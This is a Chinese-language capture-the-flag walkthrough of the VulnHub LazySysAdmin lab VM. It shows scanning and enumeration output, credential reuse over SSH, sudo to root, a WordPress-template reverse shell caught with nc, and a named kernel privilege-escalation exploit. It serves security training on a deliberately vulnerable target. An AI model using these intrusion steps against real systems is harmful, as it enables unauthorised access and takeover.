—————— 昨日回顾 ——————
红日安全出品|转载请注明来源
文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!(来源:红日安全)
—————— —————— —————
01环境下载
Lazysysadmin.zip (Size: 479 MB)Download:
https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&export=downloadDownload (Mirror):
https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zipDownload (Torrent):
https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip.torrent ( Magnet)
02运行环境
· Virtualbox (二选一)
· Vnware Workstation player
03通关提示
· Enumeration is key
· Try Harder
· Look in front of you
· Tweet @togiemcdogie if you need more hints
04ip探测
由于我们的目标与我们的物理机位于同一网段,所以我们要做的就是先获取目标机器的地址。在内网主机探测中,可以使用netdiscover来进行。
netdiscover -i wlo1
➜ evilk0 netdiscover -i wlo1
Currently scanning: 192.168.21.0/16 | Screen View: Unique Hosts
1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 42
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH
05端口扫描
我们需要知道目标机器上运行了哪些服务,利用某些服务的漏洞或配置不当来进行攻击,所以我们先进行端口扫描。
使用masscan扫描
masscan 192.168.0.100 -p 1-10000 --rate=1000
➜ evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
使用nmap扫描
nmap -T4 -A -v 192.168.0.100 -p 0-10000
➜ evilk0 nmap -T4 -A -v 192.168.0.31 -p0-10000
Starting Nmap 7.50 ( https://nmap.org ) at 2018-01-31 20:55 CST
.................................
Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
.................................
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1.0
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.2.107
|_ error: Closing link: (nmap@192.168.2.107) [Client exited]
MAC Address: 08:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.008 days (since Wed Jan 31 20:44:16 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LAZYSYSADMIN<00> Flags: <unique><active>
| LAZYSYSADMIN<03> Flags: <unique><active>
| LAZYSYSADMIN<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2018-01-31T22:55:23+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms LazySysAdmin.lan (192.168.0.100)
NSE: Script Post-scanning.
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds
Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB)
对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap了。根据扫描结果可知目标机开启了22、80、139、445、3306、6667这几个端口。
我们先从web入手。我们先使用dirb来爆破目标存在的目录(dirb安装方法附在文章最后)
➜ evilk0 ./dirb http://192.168.0.100 wordlists/common.txt -o /home/evilk0/Desktop/result.txt
用法:./dirb 目标url 用于爆破的目录 -o 输出文件
在工具扫描的同时,我们手工探测漏洞利用点。访问目标web服务,未发现什么,查看是否存在robots.txt发现4个目录,并且存在目录遍历漏洞,但是并没用获取到可以利用的信息。
http://192.168.0.100/robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。
➜ evilk0 curl -I 192.168.0.100
HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 13:01:20 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
ETag: "8ce8-5560ea23d23c0"
Accept-Ranges: bytes
Content-Length: 36072
Vary: Accept-Encoding
Content-Type: text/html
我们再来看看dirb扫描结果,发现目标文章用的是wordpress,且还有phpmyadmin
➜ dirb222 cat /home/evilk0/Desktop/result.txt | grep "^+"
+ http://192.168.0.100/index.html (CODE:200|SIZE:36072)
+ http://192.168.0.100/info.php (CODE:200|SIZE:77257)
+ http://192.168.0.100/robots.txt (CODE:200|SIZE:92)
+ http://192.168.0.100/server-status (CODE:403|SIZE:293)
+ http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)
+ http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)
+ http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)
+ http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)
+ http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)
+ http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
+ http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)
+ http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
wpscan扫描结果
root@kali:~# wpscan http://192.168.0.100/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.0.100/wordpress/
[+] Started: Thu Feb 1 01:37:20 2018
[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/
[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml
[+] WordPress theme in use: twentyfifteen - v1.8
[+] Name: twentyfifteen - v1.8
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/
| Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 1.9
| Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css
| Theme Name: Twenty Fifteen
| Theme URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Finished: Thu Feb 1 01:37:24 2018
[+] Requests Done: 356
[+] Memory used: 37.98 MB
[+] Elapsed time: 00:00:04
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 1 00:46:08 2018
==========================
| Target Information |
==========================
Target ........... 192.168.0.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.0.100 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 192.168.0.100 |
=============================================
Looking up status of 192.168.0.100
LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 192.168.0.100 |
======================================
[+] Server 192.168.0.100 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.0.100 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.168.0.100 |
=======================================
[+] Got OS info for 192.168.0.100 from smbclient:
[+] Got OS info for 192.168.0.100 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 192.168.0.100 |
==============================
==========================================
| Share Enumeration on 192.168.0.100 |
==========================================
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
[+] Attempting to map shares on 192.168.0.100
//192.168.0.100/print$ Mapping: DENIED, Listing: N/A
//192.168.0.100/share$ Mapping: OK, Listing: OK
//192.168.0.100/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Password Policy Information for 192.168.0.100 |
=====================================================
[+] Attaching to 192.168.0.100 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] LAZYSYSADMIN
[+] Builtin
[+] Password Info for Domain: LAZYSYSADMIN
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
===============================
| Groups on 192.168.0.100 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 192.168.0.100 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)
==============================================
| Getting printer info for 192.168.0.100 |
==============================================
No printers returned.
enum4linux complete on Thu Feb 1 00:46:33 2018
windows下获取共享资源
net use k: \\192.168.0.100\share$
linux下获取共享资源
mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt
发现两个关键的文件deets.txt和wp-config.php
所以我们尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。
不过不要紧,上面还有一个密码是12345,而且之前我们登录WordPress页面的时候,页面显示My name is togie.,所以我们可以用账号:togie 密码:12345尝试登录ssh,发现可以成功登录。
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)
有了root权限,我们就有权限查看目标文件/root/proof.txt,这样就算完成了整个游戏了。这里刚好togie有root权限,所以我直接用sudo su切换到root权限,但是如果togie没有root权限,那么我们就需要通过其他方式来提权了。
06思路二
通过账号:Admin 密码:TogieMYSQL12345^^登录WordPress控制面板,向404.php页面模板插入PHP反弹shell的代码。
编辑好后,点击下面的upload file应用,然后访问http://192.168.0.100/wordpress/?p=2
root@kali:~# nc -vlp 1234
listening on [any] 1234 ...
192.168.0.100: inverse host lookup failed: Unknown host
connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] 36468
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
16:03:42 up 6 min, 0 users, load average: 0.01, 0.15, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo su
sudo: no tty present and no askpass program specified
出现no tty present and no askpass program specified,刚好目标机有python环境,所以我们导入Python的pty模块。
python -c 'import pty; pty.spawn("/bin/sh")'
但是我们不知道www-data的密码,所以接下来就要进行提权,先来看一下目标机的详细信息
$ uname -r
4.4.0-31-generic
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
所以用CVE-2017-1000112提权即可,但是目标机上没有gcc,这时候,我们可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。
dirb安装方法(kali已自带)
wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
./dirb #运行即可
07参考链接
VulnHub Walk-through – LazySysAdmin: 1
LazySysAdmin Vulnerable Machine Walk-through
海量安全课程 点击以下链接 即可观看